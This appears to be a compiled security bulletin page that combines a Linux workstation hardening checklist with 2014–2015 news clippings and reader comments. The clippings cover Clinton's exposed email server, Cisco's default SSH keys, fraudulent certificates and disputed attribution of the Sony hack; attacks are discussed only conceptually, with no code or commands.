Avoid Firewire, thunderbolt, and ExpressCard ports
Firewire is a standard that, by design, allows any connecting device full direct memory access to your system (see Wikipedia). Thunderbolt and ExpressCard are guilty of the same, though some later implementations of Thunderbolt attempt to limit the scope of memory access. It is best if the system you are getting has none of these ports, but it is not critical, as they usually can be turned off via UEFI or disabled in the kernel itself.
TPM Chip
Trusted Platform Module (TPM) is a crypto chip bundled with the motherboard separately from the core processor, which can be used for additional platform security (such as to store full-disk encryption keys), but is not normally used for day-to-day workstation operation. At best, this is a nice-to-have, unless you have a specific need to use TPM for your workstation security.
Checklist
- Has a robust MAC/RBAC implementation (SELinux/AppArmor/GrSecurity) (ESSENTIAL)
- Publishes security bulletins (ESSENTIAL)
- Provides timely security patches (ESSENTIAL)
- Provides cryptographic verification of packages (ESSENTIAL)
- Fully supports UEFI and SecureBoot (ESSENTIAL)
- Has robust native full disk encryption support (ESSENTIAL)
[Oct 13, 2015] Hillary Clintons private server was open to low-skilled-hackers
Notable quotes:
"... " That's total amateur hour. Real enterprise-class security, with teams dedicated to these things, would not do this" -- ..."
"... The government and security firms have published warnings about allowing this kind of remote access to Clinton's server. The same software was targeted by an infectious Internet worm, known as Morta, which exploited weak passwords to break into servers. The software also was known to be vulnerable to brute-force attacks that tried password combinations until hackers broke in, and in some cases it could be tricked into revealing sensitive details about a server to help hackers formulate attacks. ..."
"... Also in 2012, the State Department had outlawed use of remote-access software for its technology officials to maintain unclassified servers without a waiver. It had banned all instances of remotely connecting to classified servers or servers located overseas. ..."
"... The findings suggest Clinton's server 'violates the most basic network-perimeter security tenets: Don't expose insecure services to the Internet,' said Justin Harvey, the chief security officer for Fidelis Cybersecurity. ..."
"... The U.S. National Institute of Standards and Technology, the federal government's guiding agency on computer technology, warned in 2008 that exposed server ports were security risks. It said remote-control programs should only be used in conjunction with encryption tunnels, such as secure VPN connections. ..."
Daily Mail Online
Investigation by the Associated Press reveals that the clintonemail.com server lacked basic protections
- Microsoft remote desktop service she used was not intended for use without additional safety features - but had none
- Government and computer industry had warned at the time that such set-ups could be hacked - but nothing was done to make server safer
- President this weekend denied national security had been put at risk by his secretary of state but FBI probe is still under way
... ... ...
Clinton's server, which handled her personal and State Department correspondence, appeared to allow users to connect openly over the Internet to control it remotely, according to detailed records compiled in 2012.
Experts said the Microsoft remote desktop service wasn't intended for such use without additional protective measures, and was the subject of U.S. government and industry warnings at the time over attacks from even low-skilled intruders.
.... ... ...
Records show that Clinton additionally operated two more devices on her home network in Chappaqua, New York, that also were directly accessible from the Internet.
" That's total amateur hour. Real enterprise-class security, with teams dedicated to these things, would not do this" -- Marc Maiffret, cyber security expert
- One contained similar remote-control software that also has suffered from security vulnerabilities, known as Virtual Network Computing, and the other appeared to be configured to run websites.
- The new details provide the first clues about how Clinton's computer, running Microsoft's server software, was set up and protected when she used it exclusively over four years as secretary of state for all work messages.
- Clinton's privately paid technology adviser, Bryan Pagliano, has declined to answer questions about his work from congressional investigators, citing the U.S. Constitution's Fifth Amendment protection against self-incrimination.
- Some emails on Clinton's server were later deemed top secret, and scores of others included confidential or sensitive information.
- Clinton has said that her server featured 'numerous safeguards,' but she has yet to explain how well her system was secured and whether, or how frequently, security updates were applied.
'That's total amateur hour,' said Marc Maiffret, who has founded two cyber security companies. He said permitting remote-access connections directly over the Internet would be the result of someone choosing convenience over security or failing to understand the risks. 'Real enterprise-class security, with teams dedicated to these things, would not do this,' he said.
The government and security firms have published warnings about allowing this kind of remote access to Clinton's server. The same software was targeted by an infectious Internet worm, known as Morta, which exploited weak passwords to break into servers. The software also was known to be vulnerable to brute-force attacks that tried password combinations until hackers broke in, and in some cases it could be tricked into revealing sensitive details about a server to help hackers formulate attacks.
'An attacker with a low skill level would be able to exploit this vulnerability,' said the Homeland Security Department's U.S. Computer Emergency Readiness Team in 2012, the same year Clinton's server was scanned.
Also in 2012, the State Department had outlawed use of remote-access software for its technology officials to maintain unclassified servers without a waiver. It had banned all instances of remotely connecting to classified servers or servers located overseas.
The findings suggest Clinton's server 'violates the most basic network-perimeter security tenets: Don't expose insecure services to the Internet,' said Justin Harvey, the chief security officer for Fidelis Cybersecurity.
Clinton's email server at one point also was operating software necessary to publish websites, although it was not believed to have been used for this purpose.
Traditional security practices dictate shutting off all a server's unnecessary functions to prevent hackers from exploiting design flaws in them.
In Clinton's case, Internet addresses the AP traced to her home in Chappaqua revealed open ports on three devices, including her email system.
Each numbered port is commonly, but not always uniquely, associated with specific features or functions. The AP in March was first to discover Clinton's use of a private email server and trace it to her home.
Mikko Hypponen, the chief research officer at F-Secure, a top global computer security firm, said it was unclear how Clinton's server was configured, but an out-of-the-box installation of remote desktop would have been vulnerable.
Those risks - such as giving hackers a chance to run malicious software on her machine - were 'clearly serious' and could have allowed snoops to deploy so-called 'back doors.'
The U.S. National Institute of Standards and Technology, the federal government's guiding agency on computer technology, warned in 2008 that exposed server ports were security risks.
It said remote-control programs should only be used in conjunction with encryption tunnels, such as secure VPN connections.
Personal workstation backups
Workstation backups tend to be overlooked or done in a haphazard, often unsafe manner.
Checklist
- Set up encrypted workstation backups to external storage (ESSENTIAL)
- Use zero-knowledge backup tools for off-site/cloud backups (NICE)
Firefox for work and high security sites
Use Firefox to access work-related sites, where extra care should be taken to ensure that data like cookies, sessions, login information, keystrokes, etc, should most definitely not fall into attackers' hands. You should NOT use this browser for accessing any other sites except select few.
You should install the following Firefox add-ons:
- NoScript (ESSENTIAL)
- NoScript prevents active content from loading, except from user whitelisted domains. It is a great hassle to use with your default browser (though offers really good security benefits), so we recommend only enabling it on the browser you use to access work-related sites.
- Privacy Badger (ESSENTIAL)
- EFF's Privacy Badger will prevent most external trackers and ad platforms from being loaded, which will help avoid compromises on these tracking sites from affecting your browser (trackers and ad sites are very commonly targeted by attackers, as they allow rapid infection of thousands of systems worldwide).
- HTTPS Everywhere (ESSENTIAL)
- This EFF-developed Add-on will ensure that most of your sites are accessed over a secure connection, even if a link you click is using http:// (great to avoid a number of attacks, such as SSL-strip).
- Certificate Patrol (NICE)
- This tool will alert you if the site you're accessing has recently changed their TLS certificates -- especially if it wasn't nearing expiration dates or if it is now using a different certification authority. It helps alert you if someone is trying to man-in-the-middle your connection, but generates a lot of benign false-positives.
You should leave Firefox as your default browser for opening links, as NoScript will prevent most active content from loading or executing.
Chrome/Chromium for everything else
Chromium developers are ahead of Firefox in adding a lot of nice security features (at least on Linux), such as seccomp sandboxes, kernel user namespaces, etc, which act as an added layer of isolation between the sites you visit and the rest of your system. Chromium is the upstream open-source project, and Chrome is Google's proprietary binary build based on it (insert the usual paranoid caution about not using it for anything you don't want Google to know about).
It is recommended that you install Privacy Badger and HTTPS Everywhere extensions in Chrome as well and give it a distinct theme from Firefox to indicate that this is your "untrusted sites" browser.
2: Use two different browsers, one inside a dedicated VM (NICE)
This is a similar recommendation to the above, except you will add an extra step of running the "everything else" browser inside a dedicated VM that you access via a fast protocol, allowing you to share clipboards and forward sound events (e.g. Spice or RDP). This will add an excellent layer of isolation between the untrusted browser and the rest of your work environment, ensuring that attackers who manage to fully compromise your browser will then have to additionally break out of the VM isolation layer in order to get to the rest of your system.
This is a surprisingly workable configuration, but requires a lot of RAM and fast processors that can handle the increased load. It will also require an important amount of dedication on the part of the admin who will need to adjust their work practices accordingly.
3: Fully separate your work and play environments via virtualization (PARANOID)
See Qubes-OS project, which strives to provide a high-security workstation environment via compartmentalizing your applications into separate fully isolated VMs.
Password managers
Checklist
- Use a password manager (ESSENTIAL)
- Use unique passwords on unrelated sites (ESSENTIAL)
- Use a password manager that supports team sharing (NICE)
- Use a separate password manager for non-website accounts (NICE)
Securing SSH and PGP private keys
Personal encryption keys, including SSH and PGP private keys, are going to be the most prized items on your workstation -- something the attackers will be most interested in obtaining, as that would allow them to further attack your infrastructure or impersonate you to other admins. You should take extra steps to ensure that your private keys are well protected against theft.
Checklist
- Strong passphrases are used to protect private keys (ESSENTIAL)
- PGP Master key is stored on removable storage (NICE)
- Auth, Sign and Encrypt Subkeys are stored on a smartcard device (NICE)
- SSH is configured to use PGP Auth key as ssh private key (NICE)
Hibernate or shut down, do not suspend
When a system is suspended, the RAM contents are kept on the memory chips and can be read by an attacker (known as the Cold Boot Attack). If you are going away from your system for an extended period of time, such as at the end of the day, it is best to shut it down or hibernate it instead of suspending it or leaving it on.
The world of IT security is a rabbit hole with no bottom. If you would like to go deeper, or find out more about security features on your particular distribution, please check out the following links:
- Fedora Security Guide
- CESG Ubuntu Security Guide
- Debian Security Manual
- Arch Linux Security Wiki
- Mac OSX Security
[Dec 07, 2015] 10 Highlights of Jon Corbet's Linux Kernel Report
"... The kernel has roughly 19 million lines of code, and over 3 million lines haven't been touched in 10 years. The problem with old, unmaintained code is that it tends to harbor some really old bugs. "We have millions of systems out there running Linux and milions of people relying on security of a system on which the Linux kernel is the base," Corbet said. "If we're not going to let those people down, we need to be more serious about security."
..."In his keynote talk at Collaboration Summit, kernel contributor and LWN Editor Jon Corbet elaborated on the results of the Who Writes Linux report, released today, and gave more insights on where kernel development is headed over the next year, its challenges, and successes. Here are 10 highlights (watch the full video, below):
1. 3.15 was the biggest kernel release ever with 13,722 patches merged. "I imagine we will surpass that again," Corbet said. "The amount of changes to the kernel is just going up over time."
2. The number of developers participating is going up over time while the amount of time it takes us to create a kernel is actually dropping over time. It started at 80 days between kernel releases some time ago, and it's now down to about 63 days. "I don't know how much shorter we can get," he said.
3. Developers added seven new system calls to the kernel over the past year, along with new features such as deadline scheduling, control group reworking, multiqueue block layer, and lots of networking improvmenets. That's in addition to hundreds of new hardware drivers and thousands of bug fixes.
4. Testing is a real challenge for the kernel. Developers are doing better at finding bugs before they affect users or open a security hole. Improved integration testing during the merge window, using the zero day build bot to find problems before they get into the mainline kernel, and new free and proprietary testing tools have improved kernel testing. But there is still room for improvement.
5. Corbet's own analysis found 115 kernel CVE's in 2014, or a vulnerability every three days.
6. The kernel has roughly 19 million lines of code, and over 3 million lines haven't been touched in 10 years. The problem with old, unmaintained code is that it tends to harbor some really old bugs. "We have millions of systems out there running Linux and milions of people relying on security of a system on which the Linux kernel is the base," Corbet said. "If we're not going to let those people down, we need to be more serious about security."
7. The year 2038 problem - the year the t value runs out of bits in the kernel's existing time format - needs to be fixed sooner rather than later. The core timekeeping code of the kernel was fixed in 2014 – the other layers of the kernel will take more work.
8. The Linux kernel is getting bigger with each version and currently uses 1 MB of memory. That's too big to support devices built for the Internet of Things. The kernel tinification effort is re-thinking the traditional Linux kernel, for example getting rid of the concept of users and groups in the kernel, but it faces some resistance. "We can't just count on the dominance of Linux in this area unless we earn it" by addressing the needs of much smaller systems, Corbet said.
9. Live kernel patching is coming to the mainline kernel this year.
10. The kdbus subsystem development - an addition coming in 2015 that will help make distributed computing more secure - has been a model of how kernel development should work.
[Oct 14, 2015] Security farce at Datto Inc that held Hillary Clinton's emails revealed
[Jun 27, 2015] Cisco Security Appliances Found To Have Default SSH Keys
Jun 27, 2015 | Slashdot
June 26, 2015 | SoulskillTrailrunner7 writes: Many Cisco security appliances contain default, authorized SSH keys that can allow an attacker to connect to an appliance and take almost any action he chooses. The company said all of its Web Security Virtual Appliances, Email Security Virtual Appliances, and Content Security Management Virtual Appliances are affected by the vulnerability.This bug is about as serious as they come for enterprises. An attacker who is able to discover the default SSH key would have virtually free reign on vulnerable boxes, which, given Cisco's market share and presence in the enterprise worldwide, is likely a high number. The default key apparently was inserted into the software for support reasons.
"The vulnerability is due to the presence of a default authorized SSH key that is shared across all the installations of WSAv, ESAv, and SMAv. An attacker could exploit this vulnerability by obtaining the SSH private key and using it to connect to any WSAv, ESAv, or SMAv. An exploit could allow the attacker to access the system with the privileges of the root user," Cisco said.
[Jun 02, 2015] Sony Hack Clooney Says Movie is about Snowden, Not Journalism
Dec 22, 2014 | The Intercept
A draft of the release was sent to a senior executive in Sony’s Government Affairs office, Keith Weaver, who offered a few “concerns/edits” before they were sent to Greenwald. Weaver was concerned about how Sony described U.S. government spying. Weaver wrote:
1. In the first sentence of the second paragraph – delete the phrase “illegal spying” and either it [sic] simply as “operations” or replace it with “intelligence gathering” — so the clause would read “U.S. government’s intelligence gathering operations.”
2. In the second sentence of the second paragraph — delete the “phrase misuse of power” and replace it with “actions” or “activities” so that it would read “The NSA’s actions” or “the NSA’S activities.”
Weaver was also concerned about how the draft quoted Greenwald as saying, “Growing up, I was heavily influenced by political films, and am excited about the opportunity to be a part of a political film that will resonate with today’s moviegoers.” Weaver, who would go on to be a key figure in the damage control team on Sony’s The Interview, wondered in the same email whether Sony wanted Greenwald to describe it as a “political film.”
“That’s really more of PR point so up to you guys — and I suspect since it is his own quote Greeenwald will feel strongly,” the Sony executive wrote.
The final version of the press release took Weaver’s suggestions on toning down the language on NSA, but let Greenwald’s quote stand (Greenwald, when asked about the emails, says he was “unaware, but am not surprised, that an internal Sony lobbyist diluted the press release draft in order to avoid upsetting the government.”)
[Dec 07, 2015] Google Stares Down Yet Another Fraudulent SSL-TLS Certificate By Sean Michael Kerner
See also Another SSL-TLS fraudulent certificates issed b... Qualys Community
March 25, 2015 | InternetNews
The purpose of an SSL/TLS digital certificate is to provide a degree of authenticity and integrity to an encrypted connection. The SSL/TLS certificate helps users positively identify sites, but what happens when a certificate is wrongly issued? Just ask Google, which has more experience than most in dealing with this issue.
On March 23 Google reported that unauthorized certificates for Google domains were issued by MCS Holdings, which is an intermediate certificate authority under CNNIC. Because CNNIC is a trusted CA that is included in every major Web browser, the certificate might have been trusted by default, even though it wasn't legitimate.
Google, thanks to its own past experience, leverages HTTP public key pinning (HPKP) in Chrome and Firefox. With HPKP, sites can "pin" certificates that they will allow. As such, fraudulent certificates not pinned by Google would not be accepted as authentic.
Browsers that don't support HPKP in the same way, including Apple Safari and Microsoft Internet Explorer, might have been potentially tricked by the fraudulent certificates, however.
Google's Response
"We promptly alerted CNNIC and other major browsers about the incident, and we blocked the MCS Holdings certificate in Chrome with a CRLSet push," Google Security Engineer Adam Langley wrote in a blog post. "Chrome users do not need to take any action to be protected by the CRLSet updates."
Google uses CRLset, a certificate revocation list, to get certificates to be untrusted by the Chrome browser. Google has no indication that the fraudulent certificates were actually used in an attack, Langley added.
As to how and why CNNIC let an unauthorized Google certificate be issued, CNNIC said that MCS was using the certificate as a man-in-the-middle proxy.
"These devices intercept secure connections by masquerading as the intended destination and are sometimes used by companies to intercept their employees’ secure traffic for monitoring or legal reasons," Langley explained.
Langley said that since the proxy had a certificate issued by a public CA, the employee connections trusted the proxy.
CCNIC joins a growing list of CAs that have issued fraudulent certificates for Google over the past few years. Comodo in 2011 and Turktrust in 2013 also issued fraudulent Google certificates via intermediaries.
Sean Michael Kerner is a senior editor at eSecurityPlanet and InternetNews.com. Follow him on Twitter @TechJournalist.
[Dec 27, 2014] FBI warned Year Ago of impending Malware Attacks—But Didn’t Share Info with Sony
Multiple sources familiar with the report and FBI channels for distribution said only if members of their IT department were members of the voluntary organization Infragard, which also received the report, would they have even seen it at all.
https://firstlook.org/theintercept/2014/12/24/fbi-warning/
Nearly one year before Sony was hacked, the FBI warned that U.S. companies were facing potentially crippling data destruction malware attacks, and predicted that such a hack could cause irreparable harm to a firm’s reputation, or even spell the end of the company entirely. The FBI also detailed specific guidance for U.S. companies to follow to prepare and plan for such an attack.
But the FBI never sent Sony the report.
The Dec. 13, 2013 FBI Intelligence Assessment, “Potential Impacts of a Data-Destruction Malware Attack on a U.S. Critical Infrastructure Company’s Network,” warned that companies “must become prepared for the increasing possibility they could become victim to a data destruction cyber attack.”
The 16-page report includes details on previous malware attacks on South Korea banking and media companies—the same incidents and characteristics the FBI said Dec. 19th that it had used to conclude that North Korea was behind the Sony attack.
The report, a copy of which was obtained by The Intercept, was based on discussions with private industry representatives and was prepared after the 2012 cyber attack on Saudi Aramco. The report was marked For Official Use Only, and has not been previously released.
In it, the FBI warned, “In the current cyber climate, the FBI speculates it is not a question of if a U.S. company will experience an attempted data-destruction attack, but when and which company will fall victim.”
The detailed warning raises new questions about how prepared Sony should have been for the December hack, which resulted in terabytes of commercial and personal data being stolen or released on the internet, including sensitive company emails and employee medical and personal data. Multiple sources told The Intercept that the December 2013 report raises new questions about what Sony—which is considered by the U.S. government as part of “critical infrastructure”—did or did not do to secure its systems in the year before the cyber attack.
Earlier this month, the FBI formally accused North Korea of being behind the Sony hack. “Technical analysis of the data deletion malware used in this attack revealed links to other malware that the FBI knows North Korean actors previously developed,“ the Dec. 19th FBI press release said. “For example, there were similarities in specific lines of code, encryption algorithms, data deletion methods, and compromised networks.”
The FBI also recently referred to specific evidence they say led them to determine North Korea’s involvement, including the use of the same infrastructure, IP addresses, and similarities between the Sony attack and last year’s attack against South Korean businesses and media.
North Korea has repeatedly denied involvement in the Sony cyber attack.
The FBI warning from December 2013 focuses on the same type of data destruction malware attack that Sony fell victim to nearly a year later. The report questions whether industry was overly optimistic about recovering from such an attack and notes that some companies “wondered whether [a malware attack] could have a more significant destructive impact: the failure of the company.”
In fact, the 2013 report contains a nearly identical description of the attacks detailed in the recent FBI release. “The malware used deleted just enough data to make the machines unusable; the malware was specifically written for Korean targets, and checked for Korean antivirus products to disable,” the Dec. 2013 report said. “The malware attack on South Korean companies defaced the machine with a message from the ‘WhoIs Team.’”
Sony did not respond to The Intercept’s questions about whether they had received the report, but the FBI confirmed that Sony was not on the distribution list. “The FBI did not provide it directly to them,” FBI spokesman Paul Bresson told The Intercept. “It was provided to several of our outreach components for dissemination as appropriate.”
Multiple sources familiar with the report and FBI channels for distribution said only if members of their IT department were members of the voluntary organization Infragard, which also received the report, would they have even seen it at all.
The report obtained by The Intercept includes pages of check-lists and step-by step guidance for U.S. companies on how to prepare for, mitigate and recover from the same exact type of hack that hit Sony. Those sorts of “best practices” are critical for companies trying to fend off cases like the Sony attack, Kurt Baumgartner, Principal Security Researcher at Kaspersky Lab, told The Intercept.
Sony was “not adequately following best practices for a company of its size and sector,” Baumgartner said. “The most obvious, had they followed netflow monitoring recommendations, they would have noticed the outbound exfiltration of terabytes of data.”
Had Sony gotten the FBI report, they also would have received specific guidance prepared by the Department of Homeland Security Industrial Control Systems Cyber Emergency Response Team for preparation and planning for a successful destructive malware attack. Sources familiar with the 2013 report believe if Sony had followed these guidelines the effects of the cyber attack would have been far less severe.
The real question, then, is whether more could have been done to prevent the Sony hack, and if so, what. “Korean data was available since then—nobody really paid any attention to it,” a source within the information security industry told The Intercept. “
“The question is, who dropped the ball?” the source said. “Was the information in this report not shared or was information ignored?”
Photo: Nick Ut/AP
[Dec 26, 2014] Did North Korea Really Attack Sony?
An anonymous reader writes "Many security experts remain skeptical of North Korea's involvement in the recent Sony hacks. Schneier writes: "Clues in the hackers' attack code seem to point in all directions at once. The FBI points to reused code from previous attacks associated with North Korea, as well as similarities in the networks used to launch the attacks. Korean language in the code also suggests a Korean origin, though not necessarily a North Korean one, since North Koreans use a unique dialect. However you read it, this sort of evidence is circumstantial at best. It's easy to fake, and it's even easier to interpret it incorrectly. In general, it's a situation that rapidly devolves into storytelling, where analysts pick bits and pieces of the "evidence" to suit the narrative they already have worked out in their heads.""
BitterOak (537666) on Wednesday December 24, 2014 @06:21PM (#48670061)
I was suspicious from the moment they denied it. (Score:5, Insightful)
I was suspicious of the U.S. allegations that the North Korean government was behind it when the North Koreans denied it was them. If you're going to hack somebody to make a political statement, it makes no sense to later deny that you were involved. Someone might be trying to make it look like North Korea, but I seriously doubt they were directly involved in this.
Rei (128717) on Wednesday December 24, 2014 @06:24PM (#48670077) Homepage
Right. (Score:3)
Because the world is just full of people who would hack a company to blackmail them not to release a movie about Kim Jong Un. Because everyone loves the Great Leader! His family's personality cult^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^HVoluntary Praise Actions only take up about 1/3rd of the North Korean budget. And I mean, they totally deserve it. I mean, did you know that his father was the world's greatest golf player who never had to defecate and whose birth was fortold by a swallow and heralded by a new star in the sky?
No, of course it wasn't North Korea. Clearly it was the work of America! Because America wants nothing more than a conflict with North Korea right now. Because clearly Russia and Syria and ISIS aren't enough, no, the US obviously has nothing better to do than to try to stir up things out of the blue with the Hollywood obsessed leader of a cult state whose family has gone so far as to kidnap filmmakers and force them to make movies for him. It all just makes so damn much sense!
Cue the conspiracy theorists in three, two, one...
Anonymous Coward on Wednesday December 24, 2014 @06:26PM (#48670085)
Shakey evidence hasn't stopped the US government (Score:2, Insightful)
Removing the government, destabilising the region and killing hundreds of thousands of civilians based solely on circumstantial evidence isn't exactly new to the US government, i'm sure they don't really care who was truly responsible.
arth1 (260657) on Wednesday December 24, 2014 @07:45PM (#48670469) Homepage Journal
Re: Shakey evidence hasn't stopped the US governme (Score:4, Interesting)
There is, however, possibly the world's largest repositories of rare earth metals [wikipedia.org].
dltaylor (7510) on Wednesday December 24, 2014 @06:29PM (#48670097)
not really likely (Score:5, Interesting)
NK denied it, rather than taking credit.
Their tools are widely distributed, so faking the source is really easy.
The US government is weird combination of ineptitude and self-aggrandizement, so the FBI claims are likely pure BS designed to make the claimants look good (they were SOOO sure that had profiled the Yosemite killer years ago that it only took two more deaths to prove them wrong).
Greyfox (87712) on Wednesday December 24, 2014 @06:29PM (#48670099) Homepage Journal
To What End? (Score:2)
So what's the motive then? Plain ol' extortion, or are they trying to distract the media from the CIA torture story that came out about the same time? If it's the latter, it did a good job -- the media and public seem to have the attention span of a two-year-old.
MichaelSmith (789609) on Wednesday December 24, 2014 @06:38PM (#48670151) Homepage Journal
Re:To What End? (Score:5, Informative)
The same article over at boing boing suggested that a sacked ex employee had released the files.
Okian Warrior (537106) on Wednesday December 24, 2014 @06:39PM (#48670153) Homepage Journal
Wait - what? (Score:5, Insightful)
The FBI points to reused code from previous attacks associated with North Korea [...]
Um... I hate to be the non-technical person that points this out, but...
The evidence that implicates NK on the previous attacks - is it the same evidence used to assign blame in the current attack?
Is this citing the conclusions based on the same evidence/situation from previous attacks to give legitimacy to the evidence in the current attack?
What a scam! Claim something on flimsy evidence, then cite those claims to give legitimacy to the flimsy evidence!I wonder... can I do this sort of thing in the scientific literature? Hmmmm...
jd.schmidt (919212) on Wednesday December 24, 2014 @07:29PM (#48670401)
If NK did it, explain this one.. (Score:5, Informative)
So I hear it was an inside job, how did NK get a spy infiltrated into Sony so quickly? Does NK really have that many spy assets all over the U.S. that they can whistle up as needed? Or was this an elaborate operation set up when the movie was first announced and they managed to infiltrate a NK citizen into Sony pictures in the time it took the make the movie? How does this all actually go down? FYI, NK is pretty computer illiterate over all compared to most countries and nearly every country on the planet is better positioned than NK to pull this stunt off along with a whole bunch of independent yahoos.
Unless there is U.S. born traitor working for NK, seems that the possible suspects could be narrowed down pretty quickly. I am NOT saying NK was framed, but I AM saying there are a lot a people out there to do stuff for reasons I wouldn't and more real data is needed.
kencurry (471519) on Wednesday December 24, 2014 @07:46PM (#48670481)
So much wrong here (Score:5, Insightful)
1) No concrete evidence that a Sovereign County hacked into Sony, but POTS says he thinks they did anyways
2) Movie is probably total piece of sh*t anyways, who cares?
3) Even if NK did it, it is not an attack on US but a foreign corp with some US holding, but still a Japanese company, why don't they saber rattle instead of us?
4) The whole thing could have been PR stunt from Sony to advertise the movie
5) Why didn't POTS just tell Sony "get your sh*t together, improve your security - tired of this crap, dayum!"
Eternal Vigilance (573501) on Wednesday December 24, 2014 @08:00PM (#48670543)
The NK story was cover to protect Sony (and NSA) (Score:5, Insightful)
Of course North Korea didn't attack Sony. Asking "Did North Korea really attack Sony?" is like asking "Does NORAD really track Santa?"
The North Korea story was spin to save Sony from the devastating bad publicity about the depths of their business and technological incompetence. (The politicians who defended them will get repaid for this favor during the next election cycle. My previous comment about this from last week: They may even start using this to try to rescue that disaster of a movie. "You have to see 'The Interview'! To support free speech and America!" [slashdot.org])
The Dear Leader Of The Free World announcing "don't blame poor Sony, they were helpless victims of the evil North Koreans" totally changed the media story, saving Sony huge $$$ in both public perception and future lawsuits.
But just how America's President and trillion-dollar national security state could get things so wrong - but should always be trusted when saying who's bad and deserves to be killed, like some kind of psycho-Santa delivering death from his sleigh filled with drones - will never be questioned.
Businesses and politicians will never stop lying when it works this well.
Merry Christmas.
fremsley471 (792813) on Wednesday December 24, 2014 @06:56PM (#48670245)
Re:Occam's Razor (Score:5, Insightful)
No, Occam's Razor said the simplest answer is most likely true. The OP didn't go on a flight of fantasy, you did. Nation state hacks corporation with possible major diplomatic consequences over a B-movie? Pull the other one, it's got WMDs on it.
arth1 (260657) on Wednesday December 24, 2014 @07:03PM (#48670287) Homepage Journal
Re:Occam's Razor (Score:5, Insightful)
I do not think you know what Occam's razor is. It does not mean you need conclusive evidence to believe in something. It means the simplest explanation tends to be the best one, other things being equal.
Actually, that's not what it says. It says that plurality is not to be posited without necessity, i.e. don't add complexity to reach a conclusion if it can be reached without adding it.
The simplest solution here isn't that it's North Korea acting based on an unreleased movie they probably hadn't even heard of before this whole debacle, displaying hacking skills not seen before, and then denying it.
Much simpler solutions could be disgruntled former employees or someone doing it for the lulz. It's not like Sony hasn't been a magnet for the latter, with all the previous hacks.
In any case, unless the three letter agencies are withholding crucial information, there's not enough to go on here to point the fingers at Kim Jong-Un. I'm sure there are people who would blame him no matter what, because frankly he's an asshole of Goatse dimensions, but the evidence needs to be far more solid than this.
rwa2 (4391) * on Wednesday December 24, 2014 @08:22PM (#48670617) Homepage Journal
Re:Occam's Razor - PR stunt (Score:3)
Yeah, I'm with you here. I'm sure it's more likely that this is a PR stunt gone wild and we all fell for it. Even the POTUS fell for it. Before this, I hadn't even heard of the studio, much less the movie.
Let's see...
- Sony was already in panic mode after their security breach. This sure took the new spotlight off of that.
- OK, movie is coming out now... oh, no, no it isn't, it's too dangerous! ("ooh, forbidden fruit! No one wants to SEE a BANNED movie, do you?")
- media goes nuts. POTUS makes a statement. NK kicked off the internets.
- OK, sure, you can watch the movie, but ONLY in SELECT THEATERS NEAR YOU!
- Sounds like NK pretty much held to their party line of "huh? We didn't do it! But whatever it was, I bet you deserved it, you capitalist swine!"
suckers :P
abirdman (557790) * <abirdman&maine,rr,com> on Wednesday December 24, 2014 @09:18PM (#48670795) Homepage Journal
Re:Occam's Razor - PR stunt (Score:2)
Also, there have been no reviews of the film, either positive or negative. For a movie that looked as bad as the one shown in the previews I saw, this could what saves the box office. I can see no possible advantage for NK to invest the resources into hacking Sony over a second-rate comic movie. Who would get an advantage from the Sony hack? I'll bet a lot of Symantec licenses will be renewed before the end of the year. Sorry, just free-associating here. If I had mod points you'd get an insightful.
smaddox (928261) on Wednesday December 24, 2014 @07:51PM (#48670503)
Re: Occam's Razor (Score:2)
Your objections are easily explained away as a false flag operation initiated by an individual or group.
jrumney (197329) on Wednesday December 24, 2014 @09:34PM (#48670883) Homepage
Re:Occam's Razor (Score:2)
In order to say CIA hacked Sony, you would have to invent all sorts of motives and cover-up to explain it. The simpler explanation is that N. Korea did it, because the circumstances and evidence so far all point to it.
You mean the motives and cover-up the media has so far invented all point to it. An even simpler explanation is that disgruntled hacker groups reused some attack code, perhaps from an attack on South Korean companies a few weeks back which maybe North Korea paid them to deploy.
The narrative about The Interview being motivation for the attack didn't come out until long after the attacks, and was initially denied by the contacts the media had made, and only a few days later that statements from the supposed hackers started mentioning it. This was likely after disgruntled hackers realized that it made a better back story than the fact that they were just being assholes, and would likely deflect law enforcement attention away from them if it became widely believed
[Dec 24, 2014] Sony Hack - Likely Inside Attacker Found - Obama Claim Discredited
"...It follows the pattern. In 2002, when the U.S. broke the Geneva agreement which froze the North Korean nuclear program, the US accused North Korea of secretly engaging in u1ranium enrichment."
"...The whole purpose of the demonization in the MSM of North Korea is to justify the Asian pivot, which is actually about containment of China. The establishment believes it best to not tell the "useful idiots" in the general population so they're using North Korea so as to "protect" the clueless public."
"...P2Asia promised 60:40% realignment to Pacific Theater, from current 40;60%, but (in writing) without Atlantic Theater reduction in forces. No base closures. No redeployments. Pure Mil.Gov Stage 5 Metastasis, from 40:60% to 90:60% as it were, the greatest expansion since to Cold War, and Ukraine:Syria was just an Atlanticist chess move to ensure this will be massive. The only thing the US produces today is bad cars, and military and financial weapons of mass destruction. The Cheneyites will ensure the P2Asia $100sBs all get looted away on IDIQNB contracts. The Gang of Eight 40,000,000 'Blue Visa' Immigration Service Class Bill actually stated in the legislation 'No Bid', together with a New Federal Secret Police, and Rendition SuperMax Prisons in evert State. Together with McHealthcare, McEducatiin, McWar and McPrisons"
"..."Cui bono? Who benefits from framing North Korea?" The same people who will benefit or who did benefit from framing Serbia, Russia, Syria, Iran, or Libya ? Just a guess."
Moon of Alabama
The U.S. claims, with zero reliable evidence, that Sony was hacked by North Korea. The NYT editors believed that Weapon of Mass Destruction claim and called for action against North Korea. MoA, like others, seriously doubted the story the Obama regime told:
The tools to hack the company are well known and in the public domain. The company, Sony, had lousy internal network security and had been hacked before. The hackers probably had some inside knowledge. They used servers in Bolivia, China and South Korea to infiltrate. There is zero public evidence in the known that the hack was state sponsored.Later "explanation" of the "evidence" by the FBI was unconvincing. Now a serious security company claims to have identified the real hacker:
Kurt Stammberger, a senior vice president with cybersecurity firm Norse, told CBS News his company has data that doubts some of the FBI's findings."Sony was not just hacked, this is a company that was essentially nuked from the inside," said Stammberger.
...
"We are very confident that this was not an attack master-minded by North Korea and that insiders were key to the implementation of one of the most devastating attacks in history," said Stammberger.He says Norse data is pointing towards a woman who calls herself "Lena" and claims to be connected with the so-called "Guardians of Peace" hacking group. Norse believes it's identified this woman as someone who worked at Sony in Los Angeles for ten years until leaving the company this past May.
"This woman was in precisely the right position and had the deep technical background she would need to locate the specific servers that were compromised," Stammberger told me.
The piece also points out that the original demand by the hackers was for money and had nothing to do with an unfunny Sony movie that depicts the murder of the head of a nation state.
Attributing cyber-attacks, if possible at all, is a difficult process which usually ends with uncertain conclusions. Without further evidence it will often be wrong.
